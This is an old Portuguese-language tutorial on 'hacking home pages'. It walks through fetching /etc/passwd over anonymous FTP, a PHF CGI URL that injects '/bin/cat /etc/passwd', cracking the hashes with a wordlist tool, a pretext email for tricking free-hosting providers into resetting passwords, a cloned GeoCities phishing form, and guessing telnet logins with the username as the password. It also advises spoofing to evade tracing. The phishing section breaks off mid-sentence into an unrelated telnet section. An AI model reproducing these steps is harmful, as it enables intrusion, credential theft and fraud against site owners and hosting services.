Home Pages
1-INTRODUÇÃO :
O texto a seguir fala sobre como hackear uma home page. Aqui estão as suas seções : Precauções-cuidados que você deve tomar. Sobre as senhas-arquivos falando sobre as senhas. Desencryptando as senhas-como desencryptar senhas. Ftp-como hackear uma HP por ftp. Phf-como hackear uma HP usando o método phf Home page grátis-como hackear servidores de home page grátis Home page grátis 2-Outro método de como hackear servidores de home pages grátis Já cadastrado-Como hackear uma home page que você já tenha cadastro no mesmo servidor Telnet e exploits-Como hackear uma page usando telnet e exploits Já cadastrado 2-Outro metodo de como hackear uma hp que você já tenha cadastro no mesmo servidor.
2-PRECAUÇÕES:
Nesse texto vou ensinar deversos métodos de como hackear uma home page. Queria avisar que hackear uma home page é considerado crime e que isso dá cadeia. Toda vez que você entra em um sistema seu IP fica gravado e "eles" vão poder te encontrar. Portanto antes de cometer um ato como esse eu sugiro que vocês tomem umas medidas de segurança como spoofing e etc...
3-SOBRE AS SENHAS :
A senha esta em um arquivo
chamado passwd. Esse arquivo está normalmente em um diretório chamado etc/passwd. Então
vamos falar um pouco sobre o passwd. Quando você pega o arquivo passwd, a senha pode vir
encryptada ou então com shadow! A diferença é que a senha encryptada é a própria
senha só que esta encryptada e a senha com shadow faz com que a senha fique escondida em
outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório. Para obter
a senha escrita você vai ter que desencripta-la! As senhas com shadow são impossíveis
de "desencryptar"! (levando em conta que você não tem unix). Uma senha
encryptada é mais ou menos assim :
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh
Agora o exemplo de uma senha com
shadow :
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/
usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW
Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Você pode notar que tem um "x" no root! Esse x pode ser representado também por um "*". Agora você já sabe um pouco mais sobre o arquivo passwd e sobre as senhas.
4-DESENCRYPTANDO :
Para desencryptar uma senha precisaremos de três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14)e logicamente o arquivo onde está senha(passwd). O que é cada um? Word list- Como o próprio nome já diz, é uma lista de palavras. Desencryptador- É o programa que você vai usar para desencryptar a senha. Passwd- Nesse arquivo está a senha encryptada.
Coloque todos esses itens nesse mesmo diretório. Abra o prompt do DOS e entre no diretório onde eles estão. Agora faça o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde esta a senha" "nome da sua word list" Então vamos supor que meu programa é o jack, o arquivo é o passwd, a word list é lista. Então ficaria assim : jack passwd lista.txt
E pronto! A senha está desencryptada! Mas como isso funciona?? Quando você roda o jack ele pega o arquivo passwd e testa com todas as palavras da word list.
5-FTP
Hackear uma HP por ftp talvez seja o melhor metodo. É bem simples e rápido de ser feito. Para fazer isso vamos usar o prompt do MS-DOS. Espero que você saiba pelo menos mexer no básico do DOS. O que vamos faz é simplesmente entrar no ftp da home page com login anonymous e fazer o download do arquivo passwd. Abra o prompt do DOS. Você vai ter que entrar no ftp da HP que voce quer hackear. Normalmente a endereço é o mesmo da home page. Então digite ftp www.hackers.com Ele vai pedir seu USER. Coloque anonymous. Agora vai pedir que você coloque seu e-mail completo como senha. Claro que você vai colocar alguma coisa qualquer, tipo fuckyou@idiota.com. Você vai entrar no ftp como user anonymous e retrictions applly! Isso significa que você entrou como anonymous e com restrições aplicadas! Agora você precisa ir para o diretório etc. Entre e faça o donwload do passwd. Pra isso digite "get passwd". Pronto, o arquivo passwd vai estar no diretório que você estava quando entrou no ftp. Tipo windows, arquivos de programas.... Agora você que tem o arquivo só precisa desencryptalo e pronto! A senha estará em suas mãos..
6-PHF :
O phf é com certeza o modo mais
simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada! A
única coisa que você tem que fazer é abrir seu browser e colocar uma URL. Porém esse
método tem 95% de chance de não funcionar! A maioria dos servidores já acharam o bug e
concertaram. Só colocar essa URL no location do seu browser :
http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
Apenas isso e pronto!
7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1):
Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter ]a senha de home pages que estão nesses servidores. Tudo que voce tem que fazer é mandar um e-mail pedindo pra eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha". Façam algo mais convincente. Pegue todas as informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço "endereço da HP do cara". Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."
Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não! Provavelmente eles iram acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail!
8- HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2):
Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!! Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities. No lugar que tem escrito:
Hackear Por Telnet
Bom, como você deve saber o Ataque via Telnet é um poderosos, devido os comandos que a mesma aceita e também suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere), mas também tem sua "parte mal", você geralmente "cai" dos servidores "lentos" e também demora para enviar e receber os dígitos, por enquanto você digita ele demora um tempo para aparecer o que você digitou, ele não envia palavra por palavra, mas sim caracter por caracter, por isso a demora, mas mesmo assim, ele é fundamental para quem tá querendo alguma coisa boa...
Vamos ao ataque:
Entre na Home Page de algum servidor através de seu browser, e procure pela lista de home pages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo:
http://www.servidor.com.br/~usuário
Onde "usuário" é o login do dono da página. Se você usa o Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. . Conecte-se ao host do servidor (Ex.: www.plisnet.com.br). Então entre com o Login de um dos usuários (olhando na lista de home pages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex.: login: kurt senha: cobain).
Vamos a um breve comentário sobre a Telnet:
TELNET (Protocolo
de Terminal Virtual) é o protocolo Internet para estabelecer a conexão
entre computadores. Através dessa conexão
remota, pode-se executar programas e comandos em outra máquina, como se o teclado de seu
computador estivesse ligado diretamente a ela. O visual de uma conexão via Telnet é
semelhante ao que se tem em BBS's de interface Dos, e a operação do computador remoto se
dá da mesma forma, ou seja, através de uma linha de comandos Unix
ou a partir de um menu de comandos
disponíveis que sempre se apresenta em algum lugar da tela (esta última forma é a mais
comum em servidores que permitem acesso público).
O Telnet pode ser usado para a pesquisa de
informações e transferência de arquivos - tudo depende do que o computador ao qual
você está conectado permitir que você faça. Ele também é muito usado por operadores
de sistemas (Sysop's) a fim de fazer algum tipo de manutenção (se você pensa que o
Sysop de seu provedor sai de casa toda vez que tem algum problema nos servidores, está
muito enganado, muitas vezes ele faz a manutenção de casa mesmo, via Telnet.)
Para fazer uma conexão via Telnet, é
necessário um programa específico. O Windows 95 já vem com um (procure no diretório
c:\windows o programa Telnet.exe - deve estar lá).
Veja abaixo alguns endereços onde você pode fazer uma conexão Telnet:
netfind.if.usp.br :
Busca mundial de usuários na Internet. Digite netfind ao estabelecer a
conexão.
ned.ipac.caltech.edu: Banco de dados
Extragalático da NASA/IPAC. Digite ned na conexão.
spacelink.msfc.nasa.gov : Banco de dados da
NASA. Digite guest ao se conectar.
stis.nsf.gov : Informações científicas e
tecnológicas. Digite public na conexão.
Veja também alguns comandos que podem ser usados na Telnet:
ls -l lista os
arquivos de um diretório
ls -al lista todos os arquivos de um
diretório, mesmo os Hidden
cp x y copia o arquivo do diretório x para o
diretório y (o caminho de diretório deve ser colocado por inteiro)
mv x y move o arquivo do diretório x para o
diretório y (o caminho de diretório deve ser colocado por inteiro)
rm x deleta o arquivo x
cd xxx muda o diretório ativo para
xxx
cd .. muda o diretório ativo para o que
está 'acima' do atual
mkdir xxx cria o diretório xxx dentro do
diretório atual
rm xxx remove o diretório xxx